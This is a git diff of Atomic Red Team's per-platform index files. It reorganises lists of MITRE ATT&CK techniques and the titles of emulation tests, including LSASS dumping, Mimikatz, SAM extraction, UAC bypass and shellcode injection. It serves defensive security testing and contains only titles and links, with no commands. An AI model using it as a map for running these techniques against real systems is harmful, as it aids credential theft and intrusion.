[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1597.001 Threat Intel Vendors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1595.002 Vulnerability Scanning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1596.002 WHOIS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) + # lateral-movement - T1550.001 Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -434,40 +572,6 @@ - Atomic Test #3: Malicious User Agents - Nix [linux, macos] - T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -# collection -- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md) - - Atomic Test #5: Data Compressed - nix - zip [linux, macos] - - Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos] - - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos] - - Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux] -- T1123 Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1119 Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1115 Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1213.001 Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1530 Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md) - - Atomic Test #2: Stage data from Discovery.sh [linux, macos] -- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1113 Screen Capture](../../T1113/T1113.md) - - Atomic Test #3: X Windows Capture [linux] - - Atomic Test #4: Capture Linux Desktop using Import Tool [linux] -- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - # execution - [T1053.001 At (Linux)](../../T1053.001/T1053.001.md) - Atomic Test #1: At - Schedule a job [linux] @@ -482,11 +586,13 @@ - T1204.002 Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1106 Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1059.008 Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1059.006 Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1153 Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1053.006 Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1059.004 Unix Shell](../../T1059.004/T1059.004.md) - Atomic Test #1: Create and Execute Bash Shell Script [macos, linux] - Atomic Test #2: Command-Line Interface [macos, linux] @@ -514,6 +620,7 @@ - T1567.002 Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1020.001 Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) # initial-access diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md index 052b2df9..3adf5fa8 100644 --- a/atomics/Indexes/Indexes-Markdown/macos-index.md +++ b/atomics/Indexes/Indexes-Markdown/macos-index.md @@ -113,6 +113,76 @@ - T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1505.003 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +# credential-access +- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1552.003 Bash History](../../T1552.003/T1552.003.md) + - Atomic Test #1: Search Through Bash History [linux, macos] +- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md) + - Atomic Test #1: Extract Browser and System credentials with LaZagne [macos] + - Atomic Test #2: Extract passwords with grep [macos, linux] +- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md) + - Atomic Test #2: Search macOS Safari Cookies [macos] +- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md) + - Atomic Test #1: AppleScript - Prompt User for Password [macos] +- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1555.001 Keychain](../../T1555.001/T1555.001.md) + - Atomic Test #1: Keychain [macos] +- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1040 Network Sniffing](../../T1040/T1040.md) + - Atomic Test #2: Packet Capture macOS [macos] +- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1110.002 Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1110.001 Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1110.003 Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1552.004 Private Keys](../../T1552.004/T1552.004.md) + - Atomic Test #2: Discover Private SSH Keys [macos, linux] + - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux] +- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) + +# collection +- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md) + - Atomic Test #5: Data Compressed - nix - zip [linux, macos] + - Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos] + - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos] + - Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux] +- T1123 Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1119 Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1115 Clipboard Data](../../T1115/T1115.md) + - Atomic Test #3: Execute commands from clipboard [macos] +- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md) + - Atomic Test #1: AppleScript - Prompt User for Password [macos] +- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md) + - Atomic Test #2: Stage data from Discovery.sh [linux, macos] +- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1113 Screen Capture](../../T1113/T1113.md) + - Atomic Test #1: Screencapture [macos] + - Atomic Test #2: Screencapture (silent) [macos] +- T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) + # defense-evasion - T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1027.001 Binary Padding](../../T1027.001/T1027.001.md) @@ -150,9 +220,6 @@ - T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1553.001 Gatekeeper Bypass](../../T1553.001/T1553.001.md) - Atomic Test #1: Gatekeeper Bypass [macos] -- [T1562.003 HISTCONTROL](../../T1562.003/T1562.003.md) - - Atomic Test #1: Disable history collection [linux, macos] - - Atomic Test #2: Mac HISTCONTROL [macos, linux] - T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md) - Atomic Test #1: Create a hidden file in a hidden directory [linux, macos] @@ -166,6 +233,9 @@ - T1564.003 Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1564 Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1562.003 Impair Command History Logging](../../T1562.003/T1562.003.md) + - Atomic Test #1: Disable history collection [linux, macos] + - Atomic Test #2: Mac HISTCONTROL [macos, linux] - T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1562.006 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -224,6 +294,7 @@ - Atomic Test #4: Modify file timestamps using reference file [linux, macos] - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -252,6 +323,7 @@ - Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux] - T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1489 Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1529 System Shutdown/Reboot](../../T1529/T1529.md) - Atomic Test #3: Restart System via `shutdown` - macOS/Linux [macos, linux] @@ -397,38 +469,6 @@ - Atomic Test #3: Malicious User Agents - Nix [linux, macos] - T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -# collection -- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md) - - Atomic Test #5: Data Compressed - nix - zip [linux, macos] - - Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos] - - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos] - - Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux] -- T1123 Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1119 Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1115 Clipboard Data](../../T1115/T1115.md) - - Atomic Test #3: Execute commands from clipboard [macos] -- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md) - - Atomic Test #1: AppleScript - Prompt User for Password [macos] -- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md) - - Atomic Test #2: Stage data from Discovery.sh [linux, macos] -- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1113 Screen Capture](../../T1113/T1113.md) - - Atomic Test #1: Screencapture [macos] - - Atomic Test #2: Screencapture (silent) [macos] -- T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - # exfiltration - T1020 Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1030 Data Transfer Size Limits](../../T1030/T1030.md) @@ -450,42 +490,6 @@ - T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -# credential-access -- [T1552.003 Bash History](../../T1552.003/T1552.003.md) - - Atomic Test #1: Search Through Bash History [linux, macos] -- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md) - - Atomic Test #1: Extract Browser and System credentials with LaZagne [macos] - - Atomic Test #2: Extract passwords with grep [macos, linux] -- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md) - - Atomic Test #2: Search macOS Safari Cookies [macos] -- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md) - - Atomic Test #1: AppleScript - Prompt User for Password [macos] -- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1555.001 Keychain](../../T1555.001/T1555.001.md) - - Atomic Test #1: Keychain [macos] -- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1040 Network Sniffing](../../T1040/T1040.md) - - Atomic Test #2: Packet Capture macOS [macos] -- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1110.002 Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1110.001 Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1110.003 Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1552.004 Private Keys](../../T1552.004/T1552.004.md) - - Atomic Test #2: Discover Private SSH Keys [macos, linux] - - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux] -- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - # initial-access - T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 526d1b20..576b8e04 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -1,4 +1,140 @@ # Windows Atomic Tests by ATT&CK Tactic & Technique +# credential-access +- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1558.004 AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1003.005 Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md) + - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows] +- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md) + - Atomic Test #3: Extracting passwords with findstr [windows] + - Atomic Test #4: Access unattend.xml [windows] +- [T1555 Credentials from Password Stores](../../T1555/T1555.md) + - Atomic Test #1: Extract Windows Credential Manager via VBA [windows] +- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md) + - Atomic Test #1: Run Chrome-password Collector [windows] + - Atomic Test #3: LaZagne - Credentials from Browser [windows] +- [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md) + - Atomic Test #1: Enumeration for Credentials in Registry [windows] + - Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows] +- T1003.006 DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1187 Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md) + - Atomic Test #2: PowerShell - Prompt User for Password [windows] +- T1558.001 Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1552.006 Group Policy Preferences](../../T1552.006/T1552.006.md) + - Atomic Test #1: GPP Passwords (findstr) [windows] + - Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows] +- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1558.003 Kerberoasting](../../T1558.003/T1558.003.md) + - Atomic Test #1: Request for service tickets [windows] +- [T1056.001 Keylogging](../../T1056.001/T1056.001.md) + - Atomic Test #1: Input Capture [windows] +- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1003.004 LSA Secrets](../../T1003.004/T1003.004.md) + - Atomic Test #1: Dumping LSA Secrets [windows] +- [T1003.001 LSASS Memory](../../T1003.001/T1003.001.md) + - Atomic Test #1: Windows Credential Editor [windows] + - Atomic Test #2: Dump LSASS.exe Memory using ProcDump [windows] + - Atomic Test #3: Dump LSASS.exe Memory using comsvcs.dll [windows] + - Atomic Test #4: Dump LSASS.exe Memory using direct system calls and API unhooking [windows] + - Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows] + - Atomic Test #6: Offline Credential Theft With Mimikatz [windows] + - Atomic Test #7: LSASS read with pypykatz [windows] +- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1003.003 NTDS](../../T1003.003/T1003.003.md) + - Atomic Test #1: Create Volume Shadow Copy with vssadmin [windows] + - Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows] + - Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows] + - Atomic Test #4: Create Volume Shadow Copy with WMI [windows] + - Atomic Test #5: Create Volume Shadow Copy with Powershell [windows] + - Atomic Test #6: Create Symlink to Volume Shadow Copy [windows] +- [T1040 Network Sniffing](../../T1040/T1040.md) + - Atomic Test #3: Packet Capture Windows Command Prompt [windows] + - Atomic Test #4: Windows Internal Packet Capture [windows] +- [T1003 OS Credential Dumping](../../T1003/T1003.md) + - Atomic Test #1: Powershell Mimikatz [windows] + - Atomic Test #2: Gsecdump [windows] + - Atomic Test #3: Credential Dumping with NPPSpy [windows] +- [T1110.002 Password Cracking](../../T1110.002/T1110.002.md) + - Atomic Test #1: Password Cracking with Hashcat [windows] +- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md) + - Atomic Test #1: Install and Register Password Filter DLL [windows] +- [T1110.001 Password Guessing](../../T1110.001/T1110.001.md) + - Atomic Test #1: Brute Force Credentials [windows] +- [T1110.003 Password Spraying](../../T1110.003/T1110.003.md) + - Atomic Test #1: Password Spray all Domain Users [windows] + - Atomic Test #2: Password Spray (DomainPasswordSpray) [windows] +- [T1552.004 Private Keys](../../T1552.004/T1552.004.md) + - Atomic Test #1: Private Keys [windows] +- [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md) + - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows] + - Atomic Test #2: Registry parse with pypykatz [windows] + - Atomic Test #3: esentutl.exe SAM copy [windows] + - Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows] +- T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) + +# collection +- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1560 Archive Collected Data](../../T1560/T1560.md) + - Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows] +- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md) + - Atomic Test #1: Compress Data for Exfiltration With Rar [windows] + - Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows] + - Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows] + - Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows] +- [T1123 Audio Capture](../../T1123/T1123.md) + - Atomic Test #1: using device audio capture commandlet [windows] +- [T1119 Automated Collection](../../T1119/T1119.md) + - Atomic Test #1: Automated Collection Command Prompt [windows] + - Atomic Test #2: Automated Collection PowerShell [windows] + - Atomic Test #3: Recon information for export with PowerShell [windows] + - Atomic Test #4: Recon information for export with Command Prompt [windows] +- [T1115 Clipboard Data](../../T1115/T1115.md) + - Atomic Test #1: Utilize Clipboard to store or execute commands from [windows] + - Atomic Test #2: Execute Commands from Clipboard using PowerShell [windows] + - Atomic Test #4: Collect Clipboard Data via VBA [windows] +- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md) + - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows] +- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md) + - Atomic Test #2: PowerShell - Prompt User for Password [windows] +- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1056.001 Keylogging](../../T1056.001/T1056.001.md) + - Atomic Test #1: Input Capture [windows] +- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md) + - Atomic Test #1: Stage data from Discovery.bat [windows] + - Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows] +- [T1114.001 Local Email Collection](../../T1114.001/T1114.001.md) + - Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows] +- T1185 Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1113 Screen Capture](../../T1113/T1113.md) + - Atomic Test #5: Windows Screencapture [windows] +- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) + # privilege-escalation - T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -19,7 +155,7 @@ - T1547.002 Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1548.002 Bypass User Access Control](../../T1548.002/T1548.002.md) +- [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md) - Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows] - Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows] - Atomic Test #3: Bypass UAC using Fodhelper [windows] @@ -77,11 +213,14 @@ - T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md) - Atomic Test #1: Append malicious start-process cmdlet [windows] +- T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1055.012 Process Hollowing](../../T1055.012/T1055.012.md) - Atomic Test #1: Process Hollowing using PowerShell [windows] + - Atomic Test #2: RunPE via VBA [windows] - [T1055 Process Injection](../../T1055/T1055.md) - Atomic Test #1: Process Injection via mavinject.exe [windows] + - Atomic Test #2: Shellcode execution via VBA [windows] - [T1547.001 Registry Run Keys / Startup 